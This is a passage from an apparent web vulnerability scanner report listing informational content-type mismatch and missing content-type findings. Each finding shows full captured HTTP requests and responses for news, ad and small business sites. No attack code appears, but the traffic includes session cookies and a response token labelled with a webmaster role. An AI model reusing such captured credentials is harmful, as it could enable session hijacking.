Cookie: surround=undefined; rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540665325%3B%20omtr_lv%3D1302538865329%7C1397146865329%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540665329%3B%20s_nr%3D1302538865334%7C1305130865334%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 11 Apr 2011 16:10:01 GMT
ETag: "1d3485c-96-cec6e840"
Accept-Ranges: bytes
X-FoxNews-EdgeTTL: 3m
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=98
Date: Mon, 11 Apr 2011 16:21:08 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 150

{"authentication":{"message":"User logged out, session invalidated","status":"ok","dqs":"e30= 5c0d1f27263717ce10d0a1c64361f825b5c87b56 1302538201"}}
17.37. http://www.foxnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxnews.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined; __qca=P0-166217050-1302538865283; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]; weatherdata_USNY0996=%7B%22weatherData%22%3A%7B%22days%22%3A%5B%7B%22lo%22%3A%2257%22%2C%22hi%22%3A%2272%22%2C%22image%22%3A%2272%22%7D%2C%7B%22lo%22%3A%2246%22%2C%22hi%22%3A%2259%22%2C%22image%22%3A%2282%22%7D%2C%7B%22lo%22%3A%2244%22%2C%22hi%22%3A%2251%22%2C%22image%22%3A%2287%22%7D%5D%2C%22country%22%3A%22United%20States%22%2C%22currentTemp%22%3A%2260%22%2C%22forecast%22%3A%22Mostly%20cloudy%20and%20windy%22%2C%22stateShort%22%3A%22NY%22%2C%22locationId%22%3A%22USNY0996%22%2C%22cityName%22%3A%22New%20York%22%7D%7D; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540673464%3B%20omtr_lv%3D1302538873468%7C1397146873468%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540673468%3B%20s_nr%3D1302538873476%7C1305130873476%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; p_DQS=e30%3D%205c0d1f27263717ce10d0a1c64361f825b5c87b56%201302538201; rsi_segs=D08734_70852|E05510_10451; _chartbeat2=bo4sy8o0ucihot8m

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 24 Jun 2010 17:21:58 GMT
ETag: "2b9190-47e-489c9e444f980"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Mon, 11 Apr 2011 16:21:35 GMT
Connection: close

............ .h.......(....... ..... .............................1-..............................................................gd..............................................................da..lj
...[SNIP]...
17.38. http://www.foxnews.com/ucat/images/291976_Jennifer121.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxnews.com
Path:   /ucat/images/291976_Jennifer121.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /ucat/images/291976_Jennifer121.jpg HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 11 Apr 2011 15:30:01 GMT
ETag: "2cc2cf-2f87-4a0a63fb9d040"
Accept-Ranges: bytes
Content-Length: 12167
Content-Type: image/jpeg
Cache-Control: max-age=83779
Expires: Tue, 12 Apr 2011 15:37:27 GMT
Date: Mon, 11 Apr 2011 16:21:08 GMT
Connection: close

GIF89ay.[......Y........s.X3.....H..f..U.uGi8...E.....h.....g.....U.vp..t....zF.V8..#..k.....7..9wG7.ZE....fF.....x.v9.jC..b.tH..V....T9.UEF37..H.g8$.$..H.cHjD6.wVUFI....K4..T...vHC...R:A.....Y...6#&.
...[SNIP]...
17.39. http://www.foxnews.com/ucat/images/292526_partridges121.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxnews.com
Path:   /ucat/images/292526_partridges121.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /ucat/images/292526_partridges121.jpg HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 11 Apr 2011 14:45:27 GMT
ETag: "2c9467-2a16-4a0a5a057cfc0"
Accept-Ranges: bytes
Content-Length: 10774
Content-Type: image/jpeg
Cache-Control: max-age=81057
Expires: Tue, 12 Apr 2011 14:52:05 GMT
Date: Mon, 11 Apr 2011 16:21:08 GMT
Connection: close

GIF89ay.[..............gV....mRdH7.L0.wd...sXH..v..u.wg............w..{cWkTG.........uvf.......rf,......XFiw.[C5.iV/(,............T6(..u......WSI..w..........2'..........iW.k`............f5'..z.......
...[SNIP]...
17.40. http://www.foxnews.com/ucat/images/292528_sucker-punch-vanessa-hudgens121.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxnews.com
Path:   /ucat/images/292528_sucker-punch-vanessa-hudgens121.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /ucat/images/292528_sucker-punch-vanessa-hudgens121.jpg HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 11 Apr 2011 15:57:43 GMT
ETag: "2cc9a9-2cd7-4a0a6a2c9ebc0"
Accept-Ranges: bytes
Content-Length: 11479
Content-Type: image/jpeg
Cache-Control: max-age=85247
Expires: Tue, 12 Apr 2011 16:01:55 GMT
Date: Mon, 11 Apr 2011 16:21:08 GMT
Connection: close

GIF89ay.[.....{e...ydX....hX..yxhcTD5...........t..i.wZ.../!................$........vXFF4'...fZV.....{tjx.................z.|w.eKeI4...hUH......zry........h.............qZ................{........lcV
...[SNIP]...
17.41. http://www.foxnews.com/weather/feed/getWeatherJsonP  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.foxnews.com
Path:   /weather/feed/getWeatherJsonP

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /weather/feed/getWeatherJsonP?callback=weather_service.location_weatherjsoncookie_callback&jsonp=jsonp1302538862742&_=1302538868768&locationId=USNY0996 HTTP/1.1
Host: www.foxnews.com
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/javascript, application/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: surround=undefined; rsi_segs=D08734_70852; __qca=P0-166217050-1302538865283; __qseg=Q_D|Q_T|Q_2120|Q_2156|Q_2149|Q_2129|Q_2118|Q_2151|Q_2150|Q_919|Q_924|Q_929|Q_928|Q_922|Q_921; weatherloc=%7B%22location%22%3A%5B%7B%22loc_id%22%3A%22USNY0996%22%2C%22zip%22%3A%2210108%22%2C%22city%22%3A%22New%20York%22%2C%22state%22%3A%22NY%22%7D%5D%7D; s_pers=%20s_vnum%3D1305130865325%2526vn%253D1%7C1305130865325%3B%20s_invisit%3Dtrue%7C1302540665325%3B%20omtr_lv%3D1302538865329%7C1397146865329%3B%20omtr_lv_s%3DFirst%2520Visit%7C1302540665329%3B%20s_nr%3D1302538865334%7C1305130865334%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|26D1953A050109CC-40000112E0004680[CE]

Response

HTTP/1.1 200 OK
Server: Apache
X-FoxNews-EdgeTTL: 180m
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=5139
Expires: Mon, 11 Apr 2011 17:46:50 GMT
Date: Mon, 11 Apr 2011 16:21:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 335

weather_service.location_weatherjsoncookie_callback('{"weatherData":{"days":[{"lo":"57","hi":"72","image":"72"},{"lo":"46","hi":"59","image":"82"},{"lo":"44","hi":"51","image":"87"}],"country":"United
...[SNIP]...
17.42. http://www.internetrix.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.internetrix.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.1.10.1302308294; fontsize=100

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:18:57 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 27 Jul 2006 04:57:48 GMT
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ....................................................ffffff..........................................................................................ffffff...............
...[SNIP]...
17.43. http://www.internetrix.net/images/event_list_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.internetrix.net
Path:   /images/event_list_bg.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/event_list_bg.gif HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/events/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 00:20:18 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 11 May 2009 23:28:26 GMT
Accept-Ranges: bytes
Content-Length: 1534
Connection: close
Content-Type: image/gif

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
17.44. http://www.rss-info.com/rss2.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.rss-info.com
Path:   /rss2.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /rss2.php?integration=js&windowopen=1&rss=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D120144%26clienttype%3Drss&number=5&width=500&ifbgcol=FFFFFF&bordercol=D0D0D0&textbgcol=F0F0F0&rssbgcol=F0F0F0&showrsstitle=1&showtext=1 HTTP/1.1
Host: www.rss-info.com
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Content-Type: text/html
Content-Length: 2906

document.write("<link rel=\"stylesheet\" href=\"http://www.rss-info.com/css/feed.css\"><center><table width=\"476\" border=\"0\" class=\"clstable\" cellspacing=\"3\">    <tr>        <td class=\"clstd\" bgcolo
...[SNIP]...
17.45. http://www.vermontopia.com/custom/content_files/img_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vermontopia.com
Path:   /custom/content_files/img_logo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /custom/content_files/img_logo.gif HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:28:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 02 Aug 2010 16:23:46 GMT
ETag: "2d9008f-9484-48cd99ff0e880"
Accept-Ranges: bytes
Content-Length: 38020
Content-Type: image/gif

......JFIF.....d.d......Ducky.......d.....XICC_PROFILE......HLino....mntrRGB XYZ .....    ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...
...[SNIP]...
17.46. http://www.vermontopia.com/custom/content_files/noimage.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vermontopia.com
Path:   /custom/content_files/noimage.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /custom/content_files/noimage.gif HTTP/1.1
Host: www.vermontopia.com
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a86813bdf156af37a69a3bdc7834aea8

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:28:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Mon, 02 Aug 2010 16:23:46 GMT
ETag: "2d90092-9a6d-48cd99ff0e880"
Accept-Ranges: bytes
Content-Length: 39533
Content-Type: image/gif

......JFIF.....d.d......Ducky.......d.....XICC_PROFILE......HLino....mntrRGB XYZ .....    ...1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...
...[SNIP]...
17.47. http://www.wptz.com/_public/js/ibLast.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wptz.com
Path:   /_public/js/ibLast.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /_public/js/ibLast.js HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Length: 113
Content-Type: application/x-javascript
ETag: "72f5c10-71-da59c300"
Vary: Accept-Encoding
Cache-Control: max-age=1410
Expires: Sat, 09 Apr 2011 12:53:15 GMT
Date: Sat, 09 Apr 2011 12:29:45 GMT
Connection: close

IBSYS.application.Application.setProperty('ibLastStarted',true);
IBSYS.application.Application.initComponents();
17.48. http://www.wptz.com/esi/postcaching/getKAtoken.esi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.wptz.com
Path:   /esi/postcaching/getKAtoken.esi

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /esi/postcaching/getKAtoken.esi?callletters=wptz&asValue=62976 HTTP/1.1
Host: www.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; AxData=; Axxd=1; _chartbeat2=2j1fe3rlajhbg39j; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.12.10.1302352179

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Length: 247
Content-Type: text/html
X-IBS-CCDS-VERSION: 2.16.16
ETag: "43939fc-583-48e06a630b300"
X-IBS-CCDS-ORIGIN: origin132
Cache-Control: max-age=1450
Expires: Sat, 09 Apr 2011 12:54:51 GMT
Date: Sat, 09 Apr 2011 12:30:41 GMT
Connection: close


                               IBSYS.hrst.commentCount.onKAToken({"TOKEN":"0SD0svP/Zk58tfSWXNJ/thuqOKP802x3","METHOD":"POST","PRIVILEGES":"RW","payload_type":"json","role":"WEBMASTER","userId":4054486,
...[SNIP]...
18. Content type is not specified  previous  next
There are 8 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

18.1. http://ad.yieldmanager.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /st

Request

GET /st?anmember=541&anprice=10&ad_type=ad&ad_size=728x90&section=1836970&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#d!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pS!!!!#<uwIu!#3pv!!!!$<uwIu!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(V!!!!#<uwIu!#5(X!!!!#<uw3o!#5(Y!!!!#<uwIu!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#5(f!!!!#<uwIu!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<e!!!!#<uwIu!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<i!!!!#<uwIu!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LE!!!!#<uwBu!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; ih="b!!!!)!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1,+^!!!!#<uwIw!1-b+!!!!#<uwQ$!1UC(!!!!#<u]FZ"; vuday1=d-=>Rd-=>R!4)FWKw-DF; BX=265jgc96pflsl&b=4&s=b9&t=92; liday1=fh'jT$o@U<!4)FWqJ%Ow

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:01:21 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 17:01:21 GMT
Pragma: no-cache
Content-Length: 4378
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
18.2. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Request

GET /st?ad_type=ad&ad_size=468x60&section=1689424&pub_redirect_unencoded=1&pub_redirect=http://r.turn.com/r/formclick/id/J81uPvGhVn72wQgAAQIBAA/url/ HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:35:43 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Sat, 09 Apr 2011 12:35:43 GMT
Pragma: no-cache
Content-Length: 4381
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
18.3. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

